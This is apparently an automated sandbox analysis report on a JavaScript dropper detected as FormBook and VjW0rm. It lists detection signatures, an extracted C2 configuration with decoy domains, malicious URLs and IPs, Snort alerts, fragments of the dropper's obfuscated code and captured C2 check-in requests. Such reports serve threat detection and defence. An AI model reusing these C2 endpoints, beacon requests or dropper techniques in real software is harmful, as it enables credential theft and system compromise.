Windows Analysis Report
CIQ-PO16266.js

Overview

General Information

Sample Name: CIQ-PO16266.js
Analysis ID: 635297
MD5: 3570adb415b3302811030be16c08f2ff
SHA1: 2da5d97870cfadf90ebb7890f58ee211ea112cbb
SHA256: 10087128422049e18547776f5785304fbf760279baddc0abdbf3943f66b780ff
Tags: jsVjw0rm

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (suppress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc.)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Source: CIQ-PO16266.js Virustotal: Detection: 25%
Source: CIQ-PO16266.js ReversingLabs: Detection: 22%
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: http://www.ratebill.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VredmFyIGN0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrext10 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre$s Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent(( Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duum Avira URL Cloud: Label: malware
Source: http://www.ratebill.com/np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf Avira URL Cloud: Label: malware
Source: http://www.rasheedabossmoves.com/np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreox Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMpN Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrentWW Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMs& Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre9 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMF Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre4 Avira URL Cloud: Label: malware
Source: http://www.pdwfifi.com/np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreeX9 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/KCQlm Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrets Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM: Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre) Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrecomputerNUMBER_OF_H Avira URL Cloud: Label: malware
Source: http://www.jlbwaterdamagerepairseattle.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreHGG Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreoX&B Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2Pac Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre~ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-1000 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrew Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vret Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrep Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrel Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrei Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreITL Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreR Avira URL Cloud: Label: malware
Source: http://www.pdwfifi.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.jlbwaterdamagerepairseattle.com/np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent((m Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreG Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter22 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0D Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr Avira URL Cloud: Label: malware
Source: http://www.muddybootslife.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrm Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrer: Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreoft.XMLHTTPll Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreG1C Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/ Avira URL Cloud: Label: malware
Source: rasheedabossmoves.com Virustotal: Detection: 7%
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Metadefender: Detection: 48%
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.bin.exe.10000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.bin.exe.10000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411660 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411659 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData

Software Vulnerabilities

Source: CIQ-PO16266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"gYMty=","WSH.CreateObject("adodb.stream")",-386']
Source: CIQ-PO16266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO16266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO16266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"']

Networking

Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Domain query: www.muddybootslife.com
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Domain query: www.pdwfifi.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 23.231.99.207 80
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Domain query: www.84866.xyz
Source: C:\Windows\explorer.exe Domain query: www.halecamilla.site
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.refreshertowels.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80
Source: C:\Windows\explorer.exe Network Connect: 207.174.214.35 80
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.145 80
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.hengyuejiguang.com
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.140.71 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49848 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49848 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49848 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49892 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49892 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49892 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49913 -> 185.53.179.171:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49913 -> 185.53.179.171:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49913 -> 185.53.179.171:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49920 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49920 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49920 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49940 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49940 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49940 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49964 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49964 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49964 -> 170.39.76.27:80
Source: C:\Windows\explorer.exe DNS query: www.84866.xyz
Source: DNS query: www.o7oiwlp.xyz
Source: DNS query: www.84866.xyz
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Source: Joe Sandbox View ASN Name: PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&4hM4=o4B0f HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvIMnAXbQu1P/ HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&4hM4=o4B0f HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs1G32f+Ix1mc&4hM4=o4B0f HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=/pe3of3KthlHX+AZdE40oBjh24oMUm2DhTWzf9+6lBsOaTWyqOSb4stDRDmzQmtt1180&4hM4=o4B0f HTTP/1.1Host: www.halecamilla.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
